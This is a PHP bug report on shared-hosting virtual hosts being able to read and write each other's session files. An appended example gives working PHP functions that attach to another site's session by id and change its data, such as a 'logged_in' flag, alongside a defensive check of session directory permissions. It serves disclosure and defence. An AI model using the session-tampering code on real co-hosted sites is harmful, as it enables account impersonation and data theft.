From:             php at ter dot dk
Operating system: Linux
PHP version:      4.3.6
PHP Bug Type:     Session related
Bug description:  A site's session data is available to all virtual hosts on the same server

Description:
------------
This is a security-related issue. I couldn't find any mention of it by
searching older bugs or reading the session-page.

If several sites are hosted on the same web server - which is the case at
most web hosting providers - a site would have access to read and write to
a particular session created by another site.

Example: Two sites are present on the same server. Site A is beyond our
control. Site B is our own website, where we can use PHP.

Site A sets a session and puts some data into this.
By using the same sessionid in our code at site B, we are able to view and
manipulate the session-data only present on the web server.

The requirements are that site A provides us with a sessionid and we have
access to another virtual host on the same webserver as the site we would
like to attack.

This is not directly related to session fixation (the session already
exists for the PHP-server). Also, the usage of session.use_only_cookies
wouldn't change anything, since we could just craft our own cookie. I
don't think that safe_mode could prevent anything, since we are just using
the php-based functions and not snooping around the session-temp-dir
manually.


Reproduce code:
---------------
I have put up an example at:

http://stock.ter.dk/session.php (as site A)
http://peter.plys.net/sessiontest.php (as site B)

stock.ter.dk is the victim website where we ordinarily would have no
access.

peter.plys.net is another website running on the same webserver. This
would emulate our own website, where we can upload our PHP code to access
and manipulate the session data. Since the session data can contain code
about whether we are logged in or not, which user we are logged in as and
the like, it might be a pretty serious security issue - although it
does require that our site is located in the same place as the victim
website. Users with dedicated servers would not be at risk.

Expected result:
----------------
The session data of stock.ter.dk and peter.plys.net would not be shared.

Actual result:
--------------
The session data of the websites are shared.

A solution might be for PHP to add the SERVERNAME to the session file (e.g.
"sess_stock.ter.dk_8a392cf...") and maybe an option to session_start() to
allow sharing of sessions (as it is today) if anybody really depends on
this "feature".


-- 
Edit bug report at http://bugs.php.net/?id=28242&edit=1
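The two halves of the report, as an added example that is not code from the bug report, from the reporter's test pages or from PHP itself: first, what a co-tenant (site B) runs to attach to a session that site A created, given only its id, which is the behaviour the report describes; second, a startup check site A can run to confirm that its session.save_path is a directory the other tenants cannot reach. The session id, the key name `logged_in`, the directory paths and the Apache directive in the comments are assumptions for illustration.

```php
<?php
// Added example for bug #28242; not code from the report or from PHP itself.
// Part 1: site B reads/alters a session that site A created.
// Part 2: site A checks that its session directory is not shared.
// Assumptions (hypothetical): $victim_sid was obtained from site A; the key
// name, paths and vhost directive below are placeholders.

// ---- Part 1: site B attaches to site A's session by id ----
// With the default "files" handler, every vhost sharing one session.save_path
// reads sess_<id> from the same directory, so naming an existing id is enough.
function read_foreign_session($sid)
{
    // Only plausible ids; keeps path characters out of the files handler.
    if (!preg_match('/^[A-Za-z0-9,-]{1,128}$/', $sid)) {
        return false;
    }
    session_id($sid);          // select the existing session instead of a new one
    session_start();           // loads and unserializes sess_<sid> into $_SESSION
    $copy = $_SESSION;         // e.g. whatever site A stored about its logged-in user
    session_write_close();     // release the lock without changing anything
    return $copy;
}

function alter_foreign_session($sid, $key, $value)
{
    if (!preg_match('/^[A-Za-z0-9,-]{1,128}$/', $sid)) {
        return false;
    }
    session_id($sid);
    session_start();
    $_SESSION[$key] = $value;  // written back into sess_<sid> on close
    session_write_close();
    return true;
}

// ---- Part 2: site A verifies its save_path is private ----
// Apache/mod_php can pin a directory per vhost; php_admin_value cannot be
// overridden by ini_set() or session_save_path() from a script:
//   <VirtualHost *:80>
//       ServerName stock.ter.dk
//       php_admin_value session.save_path /var/lib/php/sessions/stock.ter.dk
//   </VirtualHost>
// That only helps if the directory is unreadable to the other tenants, which
// requires the vhosts to run as different users (suexec, FastCGI pools);
// under one shared mod_php uid any vhost's script can still open the files.
function session_dir_is_private()
{
    $path = session_save_path();
    // The ini value may carry an "N;" depth prefix: "2;/var/lib/php/sessions".
    if (($semi = strrpos($path, ';')) !== false) {
        $path = substr($path, $semi + 1);
    }
    if ($path === '' || !is_dir($path)) {
        return false;          // unset means the system default dir, shared by all
    }
    $mode = fileperms($path) & 0777;
    if (($mode & 0077) !== 0) {
        return false;          // group/world access: other tenants can reach it
    }
    if (function_exists('posix_geteuid') && fileowner($path) !== posix_geteuid()) {
        return false;          // owned by someone else: not ours to trust
    }
    return true;
}

// Usage on site B, given an id issued by site A (hypothetical id and key):
// $victim_sid = '8a392cf...';
// print_r(read_foreign_session($victim_sid));
// alter_foreign_session($victim_sid, 'logged_in', true);
//
// Usage on site A, before its own session_start():
// if (!session_dir_is_private()) { die('session.save_path is shared'); }
```

Note that session.use_only_cookies and safe_mode do not enter into Part 1 at all, matching the report: the id is supplied with session_id() and the files handler does the rest. The check in Part 2 is only meaningful where the hosting setup actually separates tenants by user; on a single shared mod_php uid it will pass for every vhost while the data remains shared.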